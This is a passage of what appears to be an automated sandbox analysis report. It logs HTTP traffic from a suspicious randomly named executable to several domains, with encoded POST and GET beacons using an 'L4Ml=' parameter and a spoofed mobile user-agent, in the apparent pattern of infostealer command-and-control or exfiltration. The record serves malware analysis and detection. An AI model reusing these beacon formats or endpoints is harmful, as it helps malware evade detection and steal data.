                                                    Data Raw: 4c 34 4d 6c 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 57 42 35 79 52 4a 5a 37 6e 41 42 57 46 68 64 43 41 4e 52 4c 2f 7a 69 54 6f 6e 48 38 66 58 50 75 4c 36 6a 4b 67 63 2f 5a 49 34 77 70 75 52 30 33 62 48 59 74 39 56 35 41 55 69 74 64 4d 2f 6d 43 44 47 4d 4b 49 47 76 44 39 75 64 42 4a 6b 4a 43 5a 64 48 44 43 57 57 64 2f 46 62 42 63 6e 4b 6a 4c 53 46 43 45 39 42 45 5a 61 58 7a 7a 61 52 70 55 64 75 68 37 56 7a 55 4e 65 41 43 65 6c 73 34 4c 43 6c 6b 5a 31 72 48 66 51 6a 66 36 32 46 31 54 38 6e 6e 32 4d 6b 30 72 6a 36 51 49 46 72 75 33 67 7a 48 31 63 4c 64 6e 42 6a 78 61 57 34 7a 61 61 35 41 32 76 69 6f 7a 65 55 3d
                                                    Data Ascii: L4Ml=u0BgzfkYmwySWB5yRJZ7nABWFhdCANRL/ziTonH8fXPuL6jKgc/ZI4wpuR03bHYt9V5AUitdM/mCDGMKIGvD9udBJkJCZdHDCWWd/FbBcnKjLSFCE9BEZaXzzaRpUduh7VzUNeACels4LClkZ1rHfQjf62F1T8nn2Mk0rj6QIFru3gzH1cLdnBjxaW4zaa5A2viozeU=
                                                    Sep 24, 2024 17:18:42.692819118 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:42 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: d31ea0bf-a018-4941-a381-13c11b3f035a
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=d31ea0bf-a018-4941-a381-13c11b3f035a; expires=Tue, 24 Sep 2024 15:33:42 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:42.692847013 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDMxZWEwYmYtYTAxOC00OTQxLWEzODEtMTNjMTFiM2YwMzVhIiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.863714199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:44.910325050 CEST769OUTPOST /8lrv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donante-de-ovulos.biz
                                                    Origin: http://www.donante-de-ovulos.biz
                                                    Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 58 67 4a 79 58 71 78 37 68 67 42 56 4a 42 64 43 4f 64 52 48 2f 7a 2b 54 6f 6b 4b 68 63 69 66 75 4c 62 54 4b 6a 5a 44 5a 59 6f 77 70 36 68 30 49 47 58 59 6d 39 56 30 31 55 69 52 64 4d 2f 79 43 44 45 55 4b 4c 31 58 4d 39 2b 64 44 63 30 4a 4d 55 39 48 44 43 57 57 64 2f 46 4f 73 63 6e 79 6a 4c 42 64 43 46 63 42 44 61 61 58 73 6b 71 52 70 51 64 75 62 37 56 7a 4d 4e 66 63 73 65 6e 6b 34 4c 44 56 6b 5a 6b 72 45 55 51 6a 56 31 57 45 65 57 4d 4f 6f 79 62 6b 31 68 31 57 57 4a 30 37 74 32 57 65 74 76 2b 44 62 6b 42 4c 61 61 56 51 46 66 74 6b 6f 73 4d 79 59 74 4a 41 65 39 79 72 2f 6b 31 4c 76 57 6c 6c 41 64 37 34 79 48 37 6e 78
                                                    Data Ascii: L4Ml=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhcifuLbTKjZDZYowp6h0IGXYm9V01UiRdM/yCDEUKL1XM9+dDc0JMU9HDCWWd/FOscnyjLBdCFcBDaaXskqRpQdub7VzMNfcsenk4LDVkZkrEUQjV1WEeWMOoybk1h1WWJ07t2Wetv+DbkBLaaVQFftkosMyYtJAe9yr/k1LvWllAd74yH7nx
                                                    Sep 24, 2024 17:18:45.236882925 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:44 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: 08e0092c-dd05-4e58-829e-07874d9fdcbe
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=08e0092c-dd05-4e58-829e-07874d9fdcbe; expires=Tue, 24 Sep 2024 15:33:45 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:45.237076044 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDhlMDA5MmMtZGQwNS00ZTU4LTgyOWUtMDc4NzRkOWZkY2JlIiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.863715199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:47.758857012 CEST1786OUTPOST /8lrv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donante-de-ovulos.biz
                                                    Origin: http://www.donante-de-ovulos.biz
                                                    Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 58 67 4a 79 58 71 78 37 68 67 42 56 4a 42 64 43 4f 64 52 48 2f 7a 2b 54 6f 6b 4b 68 63 68 2f 75 4b 74 76 4b 67 2b 58 5a 62 6f 77 70 35 68 30 7a 47 58 59 33 39 57 46 39 55 69 63 67 4d 38 4b 43 41 68 41 4b 63 30 58 4d 75 65 64 44 65 30 4a 42 5a 64 48 57 43 57 6d 52 2f 46 65 73 63 6e 79 6a 4c 41 74 43 44 4e 42 44 63 61 58 7a 7a 61 52 62 55 64 76 56 37 55 62 63 4e 63 77 53 64 58 45 34 4c 6a 46 6b 62 57 54 45 49 41 6a 54 32 57 45 47 57 4d 54 6f 79 64 41 54 68 78 57 77 4a 79 4c 74 37 43 43 33 39 4d 62 59 39 41 44 73 57 30 41 56 55 4d 6c 4c 74 50 61 31 79 5a 73 59 34 56 7a 67 70 6b 50 4f 53 31 73 56 49 64 63 67 43 2b 57 76 48 6f 36 71 46 6e 38 30 74 4d 6e 73 31 6f 4b 56 2f 74 58 49 43 50 52 4a 4e 69 39 51 36 61 61 33 67 50 46 30 45 61 71 2b 48 76 77 54 70 4f 76 67 42 72 70 6d 38 61 79 33 4a 75 74 4d 4f 78 5a 54 70 6c 38 6a 70 53 44 49 54 45 70 68 64 44 75 53 41 4b 45 72 6f 30 4a 4b 70 38 68 36 54 54 55 33 34 6d 32 63 68 52 43 75 68 41 63 62 48 2b 70 5a 36 [TRUNCATED]
                                                    Data Ascii: L4Ml=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhch/uKtvKg+XZbowp5h0zGXY39WF9UicgM8KCAhAKc0XMuedDe0JBZdHWCWmR/FescnyjLAtCDNBDcaXzzaRbUdvV7UbcNcwSdXE4LjFkbWTEIAjT2WEGWMToydAThxWwJyLt7CC39MbY9ADsW0AVUMlLtPa1yZsY4VzgpkPOS1sVIdcgC+WvHo6qFn80tMns1oKV/tXICPRJNi9Q6aa3gPF0Eaq+HvwTpOvgBrpm8ay3JutMOxZTpl8jpSDITEphdDuSAKEro0JKp8h6TTU34m2chRCuhAcbH+pZ6qsFonc3jSXjhae87yOYChmIbQOb3PvRpmnB9Or3Gkw7mVJTHaQrw6l6PgDou1MjklGxYwvsqVXg7RWwjDgbCziWH1fVxljVktMQBvX8GYfEn175SFy4vrjE0R44A5dlnDUMTmPqUruFY5+A3bmqG3uegpjcO6neFoz6+mVY6GvZ6WSTW0V4s1S21zivjwE17l/6v+1eYtKjMwqTBYw0RjhZO6F75Z8yurY6AIQqLaLgisbAfdRBiQfDCVF/EKz2fkViJSpnNb1/CEMHIaE/7tRONQe5LrNPIw91H0YLENox8leuAFXIWmilpWJaXcadsYgEhhKO7uMXirQzq1saps8DbrkBuYBHD9FtiB1v3IMyH2aD8Yz/ncMCVo8tDidrIA0qpspWdBPHbXEQcbbuMo5KJTmVB8nTgX5V4A9ykvNzN2pG37IIZxwbcm/vt+wxwQf3TZhmcx6w/ftklkxCnXmz4W8gXacOG2VgPLjh5WJnFhBM4GUiCQBd853b85BHJNFvewX6/D7fgMe2Y6sNlT+PMUU78yk4YIhDsENX0K0TA6fxp21sXDkooZ/++vEmyXJYab7QsHX7y5GFkOS9pzyy5WgWGualABcqZkdja29ErZYGGN1IHk8uPoAPQVN2jA3eMeZiPEuESw297c+Nch/n4OJwj22qFXr [TRUNCATED]
                                                    Sep 24, 2024 17:18:48.189950943 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:47 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1150
                                                    x-request-id: e89fc43a-4788-4054-abe0-8bb4ddda83a2
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                    set-cookie: parking_session=e89fc43a-4788-4054-abe0-8bb4ddda83a2; expires=Tue, 24 Sep 2024 15:33:48 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:48.190100908 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTg5ZmM0M2EtNDc4OC00MDU0LWFiZTAtOGJiNGRkZGE4M2EyIiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.863716199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:50.342324972 CEST468OUTGET /8lrv/?L4Ml=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.donante-de-ovulos.biz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:50.785259962 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:18:50 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1498
                                                    x-request-id: 618a107a-4995-4009-8e69-be755bf64bf7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h0id5wBIO6jf6hefTPTiB/gYDa/EmQZRVFewuFR2ZRN9ujlKrJ5aQKrTTTIQhmskCdMWyDa7NsUdRlMH1IMKlg==
                                                    set-cookie: parking_session=618a107a-4995-4009-8e69-be755bf64bf7; expires=Tue, 24 Sep 2024 15:33:50 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 30 69 64 35 77 42 49 4f 36 6a 66 36 68 65 66 54 50 54 69 42 2f 67 59 44 61 2f 45 6d 51 5a 52 56 46 65 77 75 46 52 32 5a 52 4e 39 75 6a 6c 4b 72 4a 35 61 51 4b 72 54 54 54 49 51 68 6d 73 6b 43 64 4d 57 79 44 61 37 4e 73 55 64 52 6c 4d 48 31 49 4d 4b 6c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h0id5wBIO6jf6hefTPTiB/gYDa/EmQZRVFewuFR2ZRN9ujlKrJ5aQKrTTTIQhmskCdMWyDa7NsUdRlMH1IMKlg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:18:50.785631895 CEST951INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjE4YTEwN2EtNDk5NS00MDA5LThlNjktYmU3NTViZjY0YmY3IiwicGFnZV90aW1lIjoxNzI3MTkxMT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.8637173.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:55.842067957 CEST728OUTPOST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 7a 4d 55 5a 57 55 70 61 30 62 6c 52 77 7a 7a 78 66 2f 54 50 31 71 4e 65 31 73 59 64 61 67 51 6f 6f 43 5a 50 43 66 66 58 2f 37 4f 44 38 4d 38 37 70 43 54 54 4d 6a 4a 30 30 46 32 4e 36 73 6c 2f 5a 47 41 53 36 76 4d 43 49 74 63 56 78 77 45 4c 2b 2b 49 77 7a 65 36 4b 75 6e 4c 48 58 4a 57 7a 50 6e 6c 55 64 65 69 6a 48 70 4f 58 4d 34 46 48 70 77 49 6b 48 69 52 58 70 73 6c 2b 48 34 31 51 74 57 65 61 57 4d 47 38 75 33 75 4a 56 42 4e 6c 69 32 2f 41 44 6c 6a 58 64 48 65 33 58 55 50 79 73 4a 41 64 50 76 74 4e 44 32 41 73 74 30 54 7a 53 61 4b 72 6d 45 4b 36 5a 67 3d
                                                    Data Ascii: L4Ml=IYTY2LYjEEx/jzMUZWUpa0blRwzzxf/TP1qNe1sYdagQooCZPCffX/7OD8M87pCTTMjJ00F2N6sl/ZGAS6vMCItcVxwEL++Iwze6KunLHXJWzPnlUdeijHpOXM4FHpwIkHiRXpsl+H41QtWeaWMG8u3uJVBNli2/ADljXdHe3XUPysJAdPvtND2Ast0TzSaKrmEK6Zg=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.8637183.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:58.386401892 CEST748OUTPOST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
